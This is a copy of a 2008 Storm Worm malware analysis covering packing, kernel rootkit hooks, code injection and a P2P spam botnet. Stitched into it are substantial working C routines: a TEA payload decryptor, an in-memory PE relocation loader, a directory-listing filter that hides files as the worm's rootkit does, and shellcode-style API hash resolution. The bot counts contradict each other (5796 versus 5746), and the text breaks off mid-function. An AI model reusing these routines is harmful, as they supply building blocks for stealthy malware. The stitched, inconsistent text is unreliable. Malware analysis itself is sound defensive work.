storm worm botnet analysis - june 2008

Upload: eskimoganges

Post on 07-Apr-2018



  • 8/4/2019 Storm Worm Botnet Analysis - June 2008

    1/26

    Storm Worm & Botnet Analysis

    Jun Zhang

    Security Researcher, Websense Security Labs

    June 2008


    Websense Security Labs

    Page 2 of 26

Introduction

This month, we caught a new worm/Trojan sample in our labs. This worm uses email and various phishing Web sites to spread and infect computers. When the worm breaks into a system, it installs a kernel driver to protect itself. With the help of the driver, it then injects malicious code into the legitimate process "services.exe" and runs it from there. Because the code runs inside a trusted system process, it can pass host firewalls easily and open a back door for the attackers.

This worm contains an SMTP client engine and a peer-to-peer client component. Obviously, these components are there for spamming or mass-mailing purposes.

During my research, I found that this worm uses various rootkit techniques to protect itself (hiding files, registry keys, ports, and the like), so it is not easily detected or removed. The worm also uses a custom packer and encryption to protect its binary. In the driver that the worm drops, we learned that it employs a user-mode APC to inject the (embedded) malicious code into the process named "services.exe".

In this paper, I will explain the worm from three aspects:

1. The interesting things that reside in its executable file (custom packer and encryption)
2. The rootkit techniques it uses
3. The peer-to-peer botnet and spamming

Okay, let's start our journey.

Overview

When this worm runs, it first unpacks itself and then drops a malicious PE file that is embedded in the executable. Next, it decrypts that malicious PE file into heap memory. When these steps are complete, the worm jumps to the heap memory containing the decrypted PE file and executes it. This is the code responsible for the bad behavior.

    Figure 1 is a high-level view of this worm's activities:

    Figure 1. Overview of the worm

    Next, I will explain how this worm accomplishes all of this, step by step.


Analysis sequence

The worm uses a custom packer and encryption to protect its binary file, so the first step it takes is to unpack and decrypt the embedded PE file.

    In this section, I will demonstrate how to use OllyDbg and IDA Pro to analyze the worm.

Dynamic Analysis

First, I use OllyDbg to debug the worm and try to dump the unpacked file.

Stage 1: Getting Started

    Figure 2. Main Routine of the Worm

Figure 2 shows the main routine of the worm. The binary exports two functions, plr and wsx. The plr function unpacks the worm itself, and wsx is the real entry point.

The plr function is passed to wsx as a parameter; it implements the custom packer used by the worm.

Stage 2: Unpack

    Figure 3. Calling Unpack Routine plr

After the execution path reaches the wsx function, the first thing it does is unpack the data section, which contains the code that will be executed next.


    Figure 4 shows the packed data section.

    Figure 4. Packed Code

From Figure 4 we can see that the packed bytes do not form any real functions; in this state the section serves only to obscure the code's purpose.

    The figure below shows the same data section after it has been unpacked:

    Figure 5. Unpacked Code

Well, it looks very nice. At this moment, we can dump the memory to a file and do a static analysis (using IDA Pro or other tools). This is my favorite way, but we could also continue debugging the worm in OllyDbg and watch what it does next.

    In the next section, I will use the IDA Pro tool to continue exploring the worm.


Static Analysis

I am very grateful for IDA Pro, which is an amazing tool. With its help, we can search every corner of the malware.

Stage 1: Decrypt & decompress in heap memory

During the analysis, I found the TEA delta constant 0x9E3779B9 in the unpacked file, and after a short analysis I was sure that this worm uses the TEA algorithm to encrypt the embedded malicious PE file.

    Figure 6. TEA Algorithm

    Entire Decrypt & Decompress Routine:

    Figure 7. Decrypt & Decompress in Heap memory
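Because the figures carrying the worm's decryption routine are not reproduced here, the following is an added example (not the paper's code and not the worm's) of what a TEA decryptor looks like in C, so the reader can recognise it in a disassembly: the per-round delta 0x9E3779B9, and in the decrypt direction the starting sum 0xC6EF3720 (32 * delta), which is a second constant worth searching for. The key and the 16-byte "PE" blob in the self-test are constructed; the ECB block mode is an assumption about how a simple unpacker stub would use TEA.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* TEA's "golden ratio" delta. Finding this constant in unpacked code is the
 * tell described above; 32 rounds is the reference schedule, so the
 * decryptor starts from sum = 32 * delta = 0xC6EF3720. */
#define TEA_DELTA  0x9E3779B9u
#define TEA_ROUNDS 32u

/* Encrypt one 64-bit block (two 32-bit words) under a 128-bit key. */
static void tea_encrypt_block(uint32_t v[2], const uint32_t k[4])
{
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    for (unsigned i = 0; i < TEA_ROUNDS; i++) {
        sum += TEA_DELTA;
        v0 += ((v1 << 4) + k[0]) ^ (v1 + sum) ^ ((v1 >> 5) + k[1]);
        v1 += ((v0 << 4) + k[2]) ^ (v0 + sum) ^ ((v0 >> 5) + k[3]);
    }
    v[0] = v0;
    v[1] = v1;
}

/* Decrypt: the same rounds in reverse, starting from the final sum. */
static void tea_decrypt_block(uint32_t v[2], const uint32_t k[4])
{
    uint32_t v0 = v[0], v1 = v[1], sum = TEA_DELTA * TEA_ROUNDS;
    for (unsigned i = 0; i < TEA_ROUNDS; i++) {
        v1 -= ((v0 << 4) + k[2]) ^ (v0 + sum) ^ ((v0 >> 5) + k[3]);
        v0 -= ((v1 << 4) + k[0]) ^ (v1 + sum) ^ ((v1 >> 5) + k[1]);
        sum -= TEA_DELTA;
    }
    v[0] = v0;
    v[1] = v1;
}

/* Process a whole buffer block by block in ECB mode (assumption: what a simple
 * unpacker stub does; len must be a multiple of 8). Words are read
 * little-endian, matching an x86 image in memory. Returns blocks handled. */
static size_t tea_buffer(uint8_t *buf, size_t len, const uint32_t k[4], int decrypt)
{
    size_t blocks = len / 8;
    for (size_t b = 0; b < blocks; b++) {
        uint32_t v[2];
        memcpy(v, buf + b * 8, 8);
        if (decrypt) tea_decrypt_block(v, k); else tea_encrypt_block(v, k);
        memcpy(buf + b * 8, v, 8);
    }
    return blocks;
}

size_t tea_encrypt_buffer(uint8_t *buf, size_t len, const uint32_t k[4]) { return tea_buffer(buf, len, k, 0); }
size_t tea_decrypt_buffer(uint8_t *buf, size_t len, const uint32_t k[4]) { return tea_buffer(buf, len, k, 1); }

/* The check to apply after each candidate decryption: did a DOS header appear? */
int looks_like_pe(const uint8_t *buf, size_t len)
{
    return len >= 2 && buf[0] == 'M' && buf[1] == 'Z';
}

/* Self-test on a constructed 16-byte blob that starts like a PE (not a real
 * sample): encrypt, confirm the bytes changed, decrypt, confirm MZ is back. */
int tea_selftest(void)
{
    uint8_t blob[16] = { 'M','Z',0x90,0x00,0x03,0x00,0x00,0x00,
                         0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00 };
    const uint32_t key[4] = { 0x11111111u, 0x22222222u, 0x33333333u, 0x44444444u }; /* made-up key */
    uint8_t orig[16];
    memcpy(orig, blob, sizeof blob);
    if (tea_encrypt_buffer(blob, sizeof blob, key) != 2) return 0;
    if (memcmp(orig, blob, sizeof blob) == 0) return 0;   /* must have changed */
    if (tea_decrypt_buffer(blob, sizeof blob, key) != 2) return 0;
    if (memcmp(orig, blob, sizeof blob) != 0) return 0;   /* must round-trip */
    return looks_like_pe(blob, sizeof blob);
}

int main(void)
{
    printf("TEA final sum 0x%08X, self-test %s\n", TEA_DELTA * TEA_ROUNDS,
           tea_selftest() ? "passed" : "FAILED");
    return 0;
}
```

When you find the delta in a sample, the key is usually four DWORDs loaded just before the round loop; dumping them and running the buffer through tea_decrypt_buffer until looks_like_pe() fires is the quickest way to recover the embedded file without single-stepping the whole routine.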

Stage 2: Jump to heap memory

At this point the worm has already expanded its payload (the malicious PE file) into heap memory, and the last thing it does before transferring control is to fix the import address table (IAT) and apply base relocations, since the image is not sitting at its preferred base address.


    Figure 8. Fix IAT & Relocation
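The relocation half of that step, as an added example that is not the paper's or the worm's code: a loader that copies a 32-bit image somewhere other than its preferred base must walk the .reloc directory and add the base delta to every HIGHLOW entry. The image, pointers and relocation block in the self-test are constructed, and the struct is a redeclaration of IMAGE_BASE_RELOCATION so the code builds without Windows headers; IAT resolution is left out because it needs a real module to resolve against.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Same layout as IMAGE_BASE_RELOCATION in winnt.h, redeclared so the example
 * builds anywhere. Each block is followed by (SizeOfBlock - 8) / 2 16-bit
 * entries: high 4 bits = type, low 12 bits = offset within the page. */
typedef struct {
    uint32_t VirtualAddress;   /* RVA of the 4 KiB page this block covers */
    uint32_t SizeOfBlock;      /* header plus entries, in bytes */
} base_relocation_t;

#define IMAGE_REL_BASED_ABSOLUTE 0   /* alignment padding, skip */
#define IMAGE_REL_BASED_HIGHLOW  3   /* 32-bit absolute address: add delta */

/* Apply the relocation directory of a 32-bit image copied to `actual_base`
 * instead of its preferred base. Returns fixups applied, or -1 if the
 * directory or a target runs outside the image (the checks a careless
 * in-memory loader skips). */
int apply_relocations(uint8_t *image, size_t image_size,
                      uint32_t reloc_rva, uint32_t reloc_size,
                      uint32_t preferred_base, uint32_t actual_base)
{
    uint32_t delta = actual_base - preferred_base;
    uint32_t off = reloc_rva, end = reloc_rva + reloc_size;
    int applied = 0;

    if (end < reloc_rva || end > image_size) return -1;
    while (off + sizeof(base_relocation_t) <= end) {
        base_relocation_t blk;
        memcpy(&blk, image + off, sizeof blk);
        if (blk.SizeOfBlock < sizeof blk || off + blk.SizeOfBlock > end) return -1;

        size_t n = (blk.SizeOfBlock - sizeof blk) / 2;
        const uint8_t *entries = image + off + sizeof blk;
        for (size_t i = 0; i < n; i++) {
            uint16_t e;
            memcpy(&e, entries + i * 2, sizeof e);
            uint16_t type = e >> 12, page_off = e & 0x0FFF;
            if (type == IMAGE_REL_BASED_ABSOLUTE) continue;
            if (type != IMAGE_REL_BASED_HIGHLOW) return -1;   /* DIR64 etc. not handled here */
            uint32_t target = blk.VirtualAddress + page_off;
            if (target + 4 > image_size || target + 4 < target) return -1;
            uint32_t value;
            memcpy(&value, image + target, sizeof value);
            value += delta;
            memcpy(image + target, &value, sizeof value);
            applied++;
        }
        off += blk.SizeOfBlock;
    }
    return applied;
}

/* Constructed sample (not a real binary): a 0x2000-byte image with preferred
 * base 0x400000, two absolute pointers at RVA 0x10 and 0x20, and a .reloc
 * block at RVA 0x1000 holding two HIGHLOW entries plus two ABSOLUTE pads. */
#define SAMPLE_SIZE      0x2000u
#define SAMPLE_PREFERRED 0x400000u
#define SAMPLE_RELOC_RVA 0x1000u

uint32_t build_sample_image(uint8_t *image)
{
    uint32_t p1 = SAMPLE_PREFERRED + 0x100, p2 = SAMPLE_PREFERRED + 0x200;
    base_relocation_t blk = { 0x0, 8 + 4 * 2 };
    uint16_t ents[4] = { (IMAGE_REL_BASED_HIGHLOW << 12) | 0x10,
                         (IMAGE_REL_BASED_HIGHLOW << 12) | 0x20, 0, 0 };
    memset(image, 0, SAMPLE_SIZE);
    memcpy(image + 0x10, &p1, 4);
    memcpy(image + 0x20, &p2, 4);
    memcpy(image + SAMPLE_RELOC_RVA, &blk, sizeof blk);
    memcpy(image + SAMPLE_RELOC_RVA + sizeof blk, ents, sizeof ents);
    return blk.SizeOfBlock;   /* the data directory's Size field */
}

uint32_t read_u32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Rebase the sample to 0x10000000 and check both pointers moved with it. */
int relocation_selftest(void)
{
    static uint8_t image[SAMPLE_SIZE];
    uint32_t reloc_size = build_sample_image(image);
    int n = apply_relocations(image, sizeof image, SAMPLE_RELOC_RVA, reloc_size,
                              SAMPLE_PREFERRED, 0x10000000u);
    if (n != 2) return 0;
    if (read_u32(image + 0x10) != 0x10000100u) return 0;
    if (read_u32(image + 0x20) != 0x10000200u) return 0;
    /* a directory that overruns the image must be rejected, not trusted */
    if (apply_relocations(image, sizeof image, SAMPLE_RELOC_RVA, 0x2000u,
                          SAMPLE_PREFERRED, 0) != -1) return 0;
    return 1;
}

int main(void)
{
    printf("relocation self-test %s\n", relocation_selftest() ? "passed" : "FAILED");
    return 0;
}
```

In the worm the "preferred base" is the ImageBase field of the decrypted PE and the "actual base" is the heap allocation; a dumped heap image with relocations already applied will therefore show absolute addresses pointing into the heap, which is one reason a raw memory dump needs its base adjusted before IDA Pro will cross-reference it cleanly.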

Assuming everything is okay, the worm jumps to the heap memory to execute the malicious PE file. From that point forward, the worm can start breaking into the system.

    Figure 9. Jump to Heap to execute

Please compare Figure 9 with Figure 5 and note that they are the same. At this point the execution path moves to heap memory, and there the worm accomplishes its evil task.

Stage 3: Drop a driver & start services

The main purpose of the malicious PE file residing in heap memory is to drop a driver and a P2P configuration file, and to start a Win32 service to load the driver.


    Drop the driver:

    Figure 10. Release Driver

This driver contains yet another malicious PE file, also encrypted. Well, this worm carries so many PE files; what a hard worker. In the next section, I will show the technique the worm's driver uses to inject this PE file into a system process.


    Drop the P2P configuration file:

    Figure 11. Release Configuration File

    Contents of this configuration file:

The worm reads other bots' information from this configuration file and then uses it to contact its brothers residing in the botnet.


    Start a Win32 service to load its driver

    Figure 12. Install Service

Now the worm has broken into the system. Next, I will investigate the heavy weapon this worm uses to protect itself and bypass the firewall. This weapon is built from rootkit techniques, so in the next section we will dive deep into the Windows kernel.


The heavy weapon: the driver (rootkit techniques)

    Figure 13. The workflow of the worm's driver

As we saw earlier, this worm drops two files: a driver named glok+.sys and a peer-to-peer configuration file named glok+serv.config. Finally, the worm starts a Win32 service to load its driver.

Normally, these sorts of malicious behaviors are difficult to find, but by intercepting the API calls (and watching the registry changes they cause) we can locate them with ease.

API Calls

    Figure 14. API Call

    Win32 Service

Figure 15. Registry Changes


Worm's rootkit functionality

The worm uses its driver to achieve the goals below:

1. Hide file (avoid being deleted)
2. Hide TCP port (hide its network connections from port-enumeration tools)
3. Hide Win32 service (avoid being detected)
4. Inject code into services.exe (smart, because it easily bypasses ring 3 (user-mode) detectors)

1. Hide file or directory

This worm hooks the native API named NtQueryDirectoryFile, so the worm can hide any file or directory whose name contains the string glok+. Do you remember the name of the driver I mentioned earlier? Yes, the driver is glok+.sys, and its name contains the string glok+.

    Code slice HookNtQueryDirectoryFile:

    Figure 16. Filter in NtQueryDirectoryFile
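The filtering step of such a hook, written out as an added example (not the paper's code slice and not the worm's driver): after the original NtQueryDirectoryFile returns, the hook walks the NextEntryOffset chain in the output buffer and unlinks every record whose name contains the marker string. The struct here is a cut-down stand-in for FILE_BOTH_DIR_INFORMATION (ASCII names, fixed-size records; both assumptions) so the buffer can be built inline; the listing is constructed. The registry hooks in the next subsection and the TCP query hook after it apply the same idea to their own output buffers.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Cut-down stand-in for FILE_BOTH_DIR_INFORMATION (assumption: ASCII names,
 * fixed-size records). The real struct is variable-length with UTF-16 names,
 * but the filter only touches NextEntryOffset and the name, which is why the
 * same code shape works for every FILE_*_DIR_INFORMATION class. */
typedef struct {
    uint32_t NextEntryOffset;   /* 0 marks the last record, as in the real struct */
    uint32_t FileNameLength;    /* bytes of FileName that are valid */
    char     FileName[32];
} dir_entry_t;

/* Bounded substring search: FileName is not guaranteed NUL-terminated. */
static int name_contains(const char *name, uint32_t len, const char *needle)
{
    size_t nl = strlen(needle);
    if (nl == 0 || len < nl) return 0;
    for (uint32_t i = 0; i + nl <= len; i++)
        if (memcmp(name + i, needle, nl) == 0) return 1;
    return 0;
}

/* What the hook does after the real call fills `buf`: walk the chain and
 * drop every record whose name contains `needle`.
 *  - middle/last record: the predecessor's NextEntryOffset skips over it
 *  - first record: no predecessor exists, so the remainder is shifted down
 *    (the hook must then also shrink IoStatus.Information by the same amount)
 *  - only record: the listing becomes empty; *now_empty tells the caller to
 *    return STATUS_NO_MORE_FILES instead of a zero-length buffer
 * Returns the number of records hidden. */
int hide_matching_entries(uint8_t *buf, size_t len, const char *needle, int *now_empty)
{
    dir_entry_t *prev = NULL;
    size_t off = 0;
    int hidden = 0;

    *now_empty = 0;
    while (off + sizeof(dir_entry_t) <= len) {
        dir_entry_t *cur = (dir_entry_t *)(buf + off);
        uint32_t next = cur->NextEntryOffset;

        if (name_contains(cur->FileName, cur->FileNameLength, needle)) {
            hidden++;
            if (prev) {
                prev->NextEntryOffset = next ? prev->NextEntryOffset + next : 0;
            } else if (next) {
                memmove(buf, buf + next, len - next);
                len -= next;
                continue;                 /* re-examine whatever is now first */
            } else {
                *now_empty = 1;
                return hidden;
            }
        } else {
            prev = cur;
        }
        if (next == 0) break;
        off += next;
    }
    return hidden;
}

/* Records still reachable through the chain: what dir or Explorer would see. */
int count_entries(const uint8_t *buf, size_t len)
{
    size_t off = 0;
    int n = 0;
    while (off + sizeof(dir_entry_t) <= len) {
        dir_entry_t cur;
        memcpy(&cur, buf + off, sizeof cur);
        n++;
        if (cur.NextEntryOffset == 0) break;
        off += cur.NextEntryOffset;
    }
    return n;
}

/* Build a constructed listing (sample names, not a real directory). */
size_t build_listing(dir_entry_t *records, const char *const *names, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        memset(&records[i], 0, sizeof records[i]);
        records[i].NextEntryOffset = (i + 1 < n) ? (uint32_t)sizeof records[i] : 0;
        records[i].FileNameLength = (uint32_t)strlen(names[i]);
        memcpy(records[i].FileName, names[i], records[i].FileNameLength);
    }
    return n * sizeof records[0];
}

/* Hide "glok+" from a listing where matches sit first, in the middle and
 * last, then from a listing whose only entry matches. */
int hide_selftest(void)
{
    static const char *const names[] = { "glok+.sys", "ntoskrnl.exe",
        "glok+serv.config", "notepad.exe", "glok+.tmp" };
    dir_entry_t records[5];
    uint8_t *buf = (uint8_t *)records;
    size_t len = build_listing(records, names, 5);
    int empty = 0;

    if (count_entries(buf, len) != 5) return 0;
    if (hide_matching_entries(buf, len, "glok+", &empty) != 3 || empty) return 0;
    if (count_entries(buf, len) != 2) return 0;
    if (memcmp(records[0].FileName, "ntoskrnl.exe", 12) != 0) return 0;
    {
        const dir_entry_t *second = (const dir_entry_t *)(buf + records[0].NextEntryOffset);
        if (memcmp(second->FileName, "notepad.exe", 11) != 0) return 0;
    }

    len = build_listing(records, names, 1);            /* only "glok+.sys" */
    if (hide_matching_entries(buf, len, "glok+", &empty) != 1 || !empty) return 0;
    return 1;
}

int main(void)
{
    printf("hide self-test %s\n", hide_selftest() ? "passed" : "FAILED");
    return 0;
}
```

The defensive counterpart is a cross-view check: enumerate the directory through the hooked API and again by parsing the NTFS MFT (or from a clean boot) and diff the two lists; a name present in one view and absent from the other is exactly what this filter produces.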

2. Hide Win32 service

As we know, using a Win32 service to load the kernel driver leaves a footprint in the registry. So the worm hooks two registry-related native APIs, NtEnumerateKey and NtEnumerateValueKey; through them the worm can erase its footprint from enumeration results.

Code slice Hook NtEnumerateKey:

    Figure 17. Filter in NtEnumerateKey

    Code slice Hook NtEnumerateValueKey:

    Figure 18. Filter in NtEnumerateValueKey

3. Hide port

This worm sends spam and connects to other bots in the botnet, so it must hide its network activity from everyone's eyes.

In the kernel, the worm locates the TCP device object (\Device\Tcp) and inline hooks its dispatch function. When anyone queries the network information (the tables behind netstat and similar tools), the worm removes its own entries from the result of the query.

Inline hook TCP DeviceIoControl functions:


Set up a completion routine for each IRP

    Code Slice - Hide Port:

4. Inject malicious PE into services.exe

This worm does not use the normal way to inject code into another process, such as CreateRemoteThread. Instead, it does it from the kernel by queuing a user-mode APC to a thread of services.exe. In the injected code, the worm uses shellcode techniques to locate the base address of kernel32.dll and to resolve the APIs it needs by itself.

    The detailed steps are shown in Figure 13.


    Code slice: Using user-mode APC

Running in services.exe

As mentioned earlier, the injected code is responsible for initializing the bot and joining the botnet.


Locating kernel32 and searching for APIs, as shellcode commonly does

    Start main thread
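The "API searching by itself" part, as an added example that is neither the paper's code nor the worm's: position-independent code cannot carry import tables, so it typically hashes each export name with a ROR-13 rolling hash and compares against precomputed constants, which keeps API name strings out of the injected bytes. The export table here is a constructed list standing in for what the injected code reads via PEB -> Ldr -> kernel32's IMAGE_EXPORT_DIRECTORY; the PEB walk itself cannot run outside Windows and is only described in the comments.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* ROR-13 hash over an ASCII name: the scheme most Win32 shellcode uses so
 * that no API name string has to be embedded in the injected code. */
uint32_t ror13_hash(const char *name)
{
    uint32_t h = 0;
    for (; *name; name++) {
        h = (h >> 13) | (h << 19);
        h += (uint8_t)*name;
    }
    return h;
}

/* Stand-in for kernel32's export name table. In the injected code the names
 * come from PEB -> Ldr -> InMemoryOrderModuleList -> kernel32 image base ->
 * IMAGE_EXPORT_DIRECTORY.AddressOfNames; this constructed list is an
 * assumption so the lookup runs anywhere. */
static const char *const sample_exports[] = {
    "CreateFileA", "GetProcAddress", "LoadLibraryA", "VirtualAlloc", "WinExec"
};
#define SAMPLE_EXPORT_COUNT (sizeof sample_exports / sizeof sample_exports[0])

/* Resolve an export by hash: returns its index (in real code, the index into
 * AddressOfNameOrdinals, then AddressOfFunctions) or -1 if absent. */
int find_export_by_hash(const char *const *names, size_t n, uint32_t wanted)
{
    for (size_t i = 0; i < n; i++)
        if (ror13_hash(names[i]) == wanted) return (int)i;
    return -1;
}

/* Two names with the same hash would resolve to the wrong function, so a
 * hash-based resolver should be checked for uniqueness over the table it
 * expects. Returns 1 if all hashes are distinct. */
int hashes_unique(const char *const *names, size_t n)
{
    for (size_t i = 0; i < n; i++)
        for (size_t j = i + 1; j < n; j++)
            if (ror13_hash(names[i]) == ror13_hash(names[j])) return 0;
    return 1;
}

/* For the defender: the hash constants an injected stub carries are stable,
 * so emitting the table for the APIs of interest gives signature material. */
size_t hash_table_for(const char *const *names, size_t n, uint32_t *out)
{
    for (size_t i = 0; i < n; i++) out[i] = ror13_hash(names[i]);
    return n;
}

int api_hash_selftest(void)
{
    uint32_t wanted = ror13_hash("LoadLibraryA");
    if (find_export_by_hash(sample_exports, SAMPLE_EXPORT_COUNT, wanted) != 2) return 0;
    if (find_export_by_hash(sample_exports, SAMPLE_EXPORT_COUNT,
                            ror13_hash("ExitProcess")) != -1) return 0;
    if (!hashes_unique(sample_exports, SAMPLE_EXPORT_COUNT)) return 0;
    return 1;
}

int main(void)
{
    uint32_t table[SAMPLE_EXPORT_COUNT];
    size_t n = hash_table_for(sample_exports, SAMPLE_EXPORT_COUNT, table);
    for (size_t i = 0; i < n; i++)
        printf("%-16s 0x%08X\n", sample_exports[i], table[i]);
    printf("self-test %s\n", api_hash_selftest() ? "passed" : "FAILED");
    return 0;
}
```

When you meet an unfamiliar 32-bit constant being compared against a value computed in a loop that rotates by 13 and adds a byte, run the names of likely imports through ror13_hash() and the constant will usually name the API for you.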


The super weapon: the P2P-based botnet

Overview

In recent years, P2P technology has been used more and more frequently in worms. A P2P-based botnet is very hard to trace and shut down, because the network is robustly connected, uses encryption, and disperses its traffic. Each bot knows only a small part of the botnet, and upgrade and recovery are accomplished easily by the botmaster.

The botnet this worm constructs is decentralized, unlike a traditional botnet with a central command-and-control server. This kind of botnet does not need a central command and control location, so the attacker can upgrade and control the infected hosts without exposing a single server that defenders could take down.

Implementation

This worm implements a distributed hash table based on the Kademlia algorithm and assigns a random 128-bit ID to each bot. The format of the information is similar to this:

Steps:

1. Use the system time as a random seed.
2. Generate the 128-bit bot ID from that seed.
3. Randomly pick the IP/UDP port from a static array carried inside the worm.
4. Keep part of the bot information in the configuration file.

You can find these bot IDs in the P2P configuration file glok+serv.config that is dropped by this worm. The contents of this file were described earlier.

An example of how to translate a bot ID saved in glok+serv.config:
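To make the Kademlia part concrete, here is an added example (not the paper's code and not the worm's) of the three operations every Kademlia node performs on 128-bit IDs: XOR distance, k-bucket index from the highest differing bit, and picking the k closest peers as a FIND_NODE lookup does. The ID generator is a xorshift expansion of a seed, an assumption standing in for the worm's time-seeded generator, which is not shown on the page; the seed and peer IDs in the self-test are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef struct { uint8_t b[16]; } node_id_t;   /* 128-bit Kademlia node ID */

/* Derive a node ID from a time-based seed. The worm's own generator is not
 * reproduced on the page; this xorshift64 expansion is an assumption that
 * keeps the property that matters: same seed, same ID. */
node_id_t make_id_from_seed(uint64_t seed)
{
    node_id_t id;
    uint64_t x = seed ? seed : 0x9E3779B97F4A7C15ull;  /* xorshift must not start at 0 */
    for (int i = 0; i < 16; i++) {
        x ^= x << 13; x ^= x >> 7; x ^= x << 17;
        id.b[i] = (uint8_t)(x >> 56);
    }
    return id;
}

/* Kademlia's metric: bitwise XOR of the two IDs. */
node_id_t xor_distance(node_id_t a, node_id_t b)
{
    node_id_t d;
    for (int i = 0; i < 16; i++) d.b[i] = a.b[i] ^ b.b[i];
    return d;
}

/* Distances compare as 128-bit big-endian integers. */
int distance_cmp(node_id_t x, node_id_t y) { return memcmp(x.b, y.b, 16); }

/* k-bucket index = position of the highest set bit of the distance (0..127);
 * -1 for identical IDs. Peers in bucket i share the top 127-i bits with us. */
int bucket_index(node_id_t d)
{
    for (int i = 0; i < 16; i++) {
        if (d.b[i] == 0) continue;
        int bit = 7;
        while (!((d.b[i] >> bit) & 1)) bit--;
        return 120 - i * 8 + bit;
    }
    return -1;
}

/* Select the k peers closest to target (ascending distance), the core of a
 * FIND_NODE lookup. Writes peer indices into out_idx, returns how many. */
size_t closest_peers(const node_id_t *peers, size_t n, node_id_t target,
                     size_t k, size_t *out_idx)
{
    size_t used = 0;
    for (size_t i = 0; i < n; i++) {
        node_id_t di = xor_distance(peers[i], target);
        size_t pos = used;
        while (pos > 0 &&
               distance_cmp(di, xor_distance(peers[out_idx[pos - 1]], target)) < 0)
            pos--;
        if (pos >= k) continue;                       /* farther than all k kept */
        size_t last = used < k ? used : k - 1;
        for (size_t j = last; j > pos; j--) out_idx[j] = out_idx[j - 1];
        out_idx[pos] = i;
        if (used < k) used++;
    }
    return used;
}

int kademlia_selftest(void)
{
    node_id_t me = make_id_from_seed(1212000000ull);  /* constructed "system time" seed */
    node_id_t peers[3];
    size_t idx[2];

    /* a time-seeded ID is reproducible by anyone who knows the seed */
    if (memcmp(make_id_from_seed(1212000000ull).b, me.b, 16) != 0) return 0;

    peers[0] = me; peers[0].b[15] ^= 0x01;   /* distance 1       -> bucket 0   */
    peers[1] = me; peers[1].b[0]  ^= 0x80;   /* top bit differs  -> bucket 127 */
    peers[2] = me; peers[2].b[8]  ^= 0x08;   /* byte 8, bit 3    -> bucket 59  */

    if (bucket_index(xor_distance(peers[0], me)) != 0)   return 0;
    if (bucket_index(xor_distance(peers[1], me)) != 127) return 0;
    if (bucket_index(xor_distance(peers[2], me)) != 59)  return 0;
    if (bucket_index(xor_distance(me, me)) != -1)        return 0;

    if (closest_peers(peers, 3, me, 2, idx) != 2) return 0;
    return idx[0] == 0 && idx[1] == 2;
}

int main(void)
{
    printf("kademlia self-test %s\n", kademlia_selftest() ? "passed" : "FAILED");
    return 0;
}
```

Two points follow from the code. A bucket only holds peers at a given distance range, so any single bot's routing table (and its dropped config file) reveals only a slice of the network, which is the property the paper credits for the botnet's resilience. And because the ID is derived from the system time, a crawler can generate IDs that land in whichever buckets it wants to fill, which is the usual starting point for enumerating such a network.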

    Botnet Communication Analysis

Protocol Analysis

To analyze this worm's peer-to-peer and spamming functionality, I captured the packets from an infected computer. The statistics of the captured packets look like this:


    Protocol Hierarchy Statistics

From the statistics, we find that the main protocol this worm uses is UDP; the worm also uses SMTP to send spam.

    Protocol Port Type

    Botnet Traffic Map

Spamming

Using its built-in SMTP client, the worm can send spam through many free SMTP servers.


    TCP Connection with SMTP Server

When the worm is connected to other bots, it can get the latest instructions and upgrades, then download and run any files. During the analysis, I found that the worm exchanges its list of SMTP servers with other bots. Spam content and adware are also exchanged with its brothers.

    The figure below shows the worm trying to connect to Google's SMTP server:

Well, it looks as if Google has improved the security of its SMTP server; the worm failed to connect to it.

    This is another SMTP server this worm is trying to connect with:


    Send Spam Through Google's SMTP Server

    Send Spam Through thevideotron.ca SMTP Server

    Some examples of spam sent by this worm:


    Another one:

    Last one:


Interacting with other bots

I kept running this worm in a test environment and collected the packets it sent. By analyzing the captured packets, I found that this worm interacted with more than 5796 infected hosts in only 21 minutes! This evidence proves that the worm has already set up a large botnet.

To protect its botnet, the worm does not carry the entire list of bots, so a single bot cannot expose the whole botnet. It uses an XOR algorithm to encrypt traffic and randomly assigns the UDP port for each bot to improve traffic dispersion. All of these methods greatly enhance the resilience of the botnet.

    UDP-based bots conversation

    The conversation list is huge; the figure above shows only part of it. Each remote host in this list isinfected. The total number of bots I observed is 5746!


    UDP Port Distribution

    Bot IP Distribution

Encryption of network traffic between bots

This worm uses a special XOR algorithm to encrypt and decrypt its network traffic. With it, the worm can hinder researchers who study it with network analyzers.


    Code Slice - Encrypt/Decrypt UDP packet

C Code - Encrypt/Decrypt algorithm

This encryption algorithm is very simple, but it is good enough to defeat signature-based IDS or IPS inspection of the traffic.
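Why "simple but good enough" cuts both ways, as an added example that is not the paper's C code and does not reproduce the worm's key schedule (which is only visible in the figure): a repeating 4-byte XOR key, an assumption standing in for the real scheme, hides a plaintext signature from an IDS, yet a few known header bytes hand the analyst the key and every message that follows. The datagram and key are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define XKEY_LEN 4

/* Repeating-key XOR over a datagram. XOR is its own inverse, so one routine
 * both encrypts and decrypts. The worm's actual key schedule is only shown
 * in the figure above; this 4-byte repeating key is an assumption. */
void xor_crypt(uint8_t *buf, size_t len, const uint8_t key[XKEY_LEN])
{
    for (size_t i = 0; i < len; i++) buf[i] ^= key[i % XKEY_LEN];
}

/* Bounded search, standing in for a content signature an IDS would apply. */
int signature_hit(const uint8_t *buf, size_t len, const char *pattern)
{
    size_t pl = strlen(pattern);
    if (pl == 0 || len < pl) return 0;
    for (size_t i = 0; i + pl <= len; i++)
        if (memcmp(buf + i, pattern, pl) == 0) return 1;
    return 0;
}

/* Known-plaintext recovery: bot messages start with a fixed header, so the
 * analyst XORs the first key-length bytes of ciphertext with that header to
 * get the key, then checks the rest of the known prefix for consistency.
 * Returns 1 and fills key_out on success, 0 if the guessed header does not fit. */
int recover_key(const uint8_t *cipher, size_t cipher_len,
                const uint8_t *known_plain, size_t known_len,
                uint8_t key_out[XKEY_LEN])
{
    if (known_len < XKEY_LEN || cipher_len < known_len) return 0;
    for (size_t i = 0; i < XKEY_LEN; i++) key_out[i] = cipher[i] ^ known_plain[i];
    for (size_t i = XKEY_LEN; i < known_len; i++)
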